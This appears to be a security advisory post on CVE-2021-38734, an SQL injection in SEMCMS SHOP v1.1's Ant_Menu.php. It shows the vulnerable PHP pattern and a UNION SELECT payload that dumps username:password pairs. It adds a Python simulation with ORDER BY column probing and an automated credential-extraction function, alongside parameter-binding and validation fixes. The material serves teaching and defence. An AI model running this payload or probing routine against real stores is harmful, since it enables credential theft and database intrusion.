SQL injection remains one of the most serious classes of web application vulnerability: it lets an attacker bypass authentication and read, and often modify, data they were never authorised to touch. Today we look at CVE-2021-38734, an SQL injection vulnerability in SEMCMS SHOP v 1.1. We'll cover the affected code pattern, how the flaw is exploited, and how to fix it.

Background

SEMCMS SHOP is an e-commerce platform for setting up and managing online storefronts. Version 1.1 is affected by an SQL injection vulnerability reachable through Ant_Menu.php. Because the injected query runs with the application's own database privileges, an attacker can read, and depending on those privileges modify, data in the store's database, including user records.

Original References

1. CVE-2021-38734 - MITRE's CVE record
2. SEMCMS SHOP Official Site - The platform's official website

Affected Code Snippet

The vulnerability is in Ant_Menu.php, where the Menu_Id request parameter reaches an SQL query without validation or parameter binding. In simplified form (this is the vulnerable pattern, not a verbatim copy of the shipped file), the code looks like this:

$Menu_Id = $_GET["Menu_Id"]; // Attacker-controlled request parameter, used as-is
$sqlstr = "select * from ".$dbtablepre."menu where id='$Menu_Id'"; // Parameter interpolated straight into the SQL text
$query = mysql_query($sqlstr); // Legacy mysql_* extension (removed in PHP 7); no parameter binding

The Menu_Id value is pasted into the query string as-is, so anything the attacker puts in the parameter is parsed by MySQL as part of the statement. Note that a genuine integer cast at the first line (intval() or a ctype_digit() check) would by itself have blocked the payload shown below, because the value could then never contain a quote or a keyword; that check is one of the mitigations listed later, but the primary fix is to stop building SQL by string concatenation at all.

Exploit Details

An attacker exploiting the SQL injection in Ant_Menu.php crafts a URL whose Menu_Id parameter closes the quoted literal and appends a second query. For example (shown unencoded for readability; in a real request the spaces and quote are URL-encoded):

https://www.example.com/Ant_Menu.php?Menu_Id=1' UNION SELECT 1,2,3,concat(username,':',password),5,6,7,8,9 from semcms_user-- -

The leading 1' terminates the string literal in where id='...', UNION SELECT appends a result set built from the semcms_user table, and the trailing -- - comments out the rest of the original statement (the closing quote the application adds). The UNION only succeeds when the number of selected columns matches the menu table, so the attacker first determines the column count, typically with a series of ORDER BY n or NULL-padded probes, and then places concat(username,':',password) in a column the page renders. The nine columns and the table name used here are illustrative. By varying the appended query the attacker can read any table the application's database account can access, and with enough privileges run other statements against the database.

Mitigation Techniques

To fix this in SEMCMS SHOP v 1.1 installations, apply the following together:

1. Use prepared statements with bound parameters (PDO or mysqli; the mysql_* extension used above has no binding API and is removed in PHP 7). User input is then passed to the database as data and is never parsed as part of the SQL text. This is the primary fix; the remaining items are defence in depth.
2. Validate the input against what it should be. Menu_Id is a numeric identifier, so reject anything that is not a digit string (ctype_digit()) and cast it with intval() before use. Do not rely on addslashes(): it is not a database-aware escaping function, it is bypassable under some multibyte connection charsets, and escaping does nothing where a value is used unquoted, for example in an ORDER BY clause.
3. Run the application with a database account limited to the tables and operations it needs (least privilege), so that a residual injection cannot read unrelated tables such as the user table or alter the schema.
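The UNION-based extraction described under Exploit Details and the first two fixes from the list above, as an added example that is not part of the original post or of SEMCMS: the code below simulates the Ant_Menu.php pattern in Python against an in-memory SQLite database. The schema (a four-column menu table and a semcms_user table with username and password columns) and the sample rows are constructed for the example; the real SEMCMS schema is not reproduced here. MySQL's concat() is registered as a user-defined function so the payload keeps the form used on the page. The example also goes slightly beyond the page by showing how the attacker first determines the column count with ORDER BY probing before building the UNION.

```python
import re
import sqlite3

# Constructed stand-in for the store database. Column names, the four-column
# menu layout and the sample rows are assumptions made for this example.
SCHEMA = """
CREATE TABLE menu (id INTEGER PRIMARY KEY, name TEXT, url TEXT, sort INTEGER);
CREATE TABLE semcms_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO menu VALUES (1, 'Home', '/', 1), (2, 'Shop', '/shop', 2);
INSERT INTO semcms_user VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    # SQLite has no concat(); register one so the MySQL-style payload runs unchanged.
    conn.create_function("concat", -1, lambda *parts: "".join(str(p) for p in parts))
    return conn


def vulnerable_lookup(conn, menu_id):
    """The Ant_Menu.php pattern: the untrusted value is pasted into the SQL text."""
    sql = f"select * from menu where id='{menu_id}'"
    return conn.execute(sql).fetchall()


def find_column_count(conn, max_cols=32):
    """Probe ORDER BY n until the database rejects it; the last n that works is the
    number of columns the UNION has to match."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"1' ORDER BY {n}-- -")
        except sqlite3.DatabaseError:
            return n - 1
    raise RuntimeError("column count not found")


def dump_credentials(conn):
    """Build the UNION payload for the discovered column count and pull
    username:password pairs out of the column the page would render."""
    cols = find_column_count(conn)
    target = 1 if cols > 1 else 0  # column index where the leaked value is placed
    fields = ",".join(
        "concat(username,':',password)" if i == target else str(i + 1) for i in range(cols)
    )
    payload = f"1' UNION SELECT {fields} from semcms_user-- -"
    rows = vulnerable_lookup(conn, payload)
    return [row[target] for row in rows if ":" in str(row[target])]


def bound_lookup(conn, menu_id):
    """Parameter binding with no validation: the whole payload arrives as one
    opaque value and is compared against id, never parsed as SQL."""
    return conn.execute("select * from menu where id=?", (menu_id,)).fetchall()


def safe_lookup(conn, menu_id):
    """Hardened form: accept only an ASCII digit string (the ctype_digit()/intval()
    check), then bind the integer as a parameter."""
    if not isinstance(menu_id, str) or not re.fullmatch(r"[0-9]{1,10}", menu_id):
        raise ValueError("Menu_Id must be a positive integer")
    return conn.execute("select * from menu where id=?", (int(menu_id),)).fetchall()


if __name__ == "__main__":
    db = connect()
    print("columns in menu:", find_column_count(db))
    print("leaked via vulnerable path:", dump_credentials(db))
    attack = "1' UNION SELECT 1,2,3,4 from semcms_user-- -"
    print("bound parameter, same input:", bound_lookup(db, attack))
    try:
        safe_lookup(db, attack)
    except ValueError as err:
        print("validated path rejected input:", err)
```

Running the file prints the recovered credential from the vulnerable path, an empty result from bound_lookup for the same input, and a ValueError from safe_lookup. Binding alone already defeats the payload, since the database compares the entire string against id as a value; the digit check in safe_lookup is defence in depth and also turns a malformed request into a clean error instead of a silent empty page.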

Conclusion

Considering the potential impact of SQL injection vulnerabilities, it's crucial to address this issue immediately. SEMCMS SHOP users and administrators should remain vigilant and ensure they implement the necessary security measures as outlined in this post. User awareness and proactive steps can help organizations avoid catastrophic breaches and safeguard their sensitive information.

Timeline

Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:34:00 UTC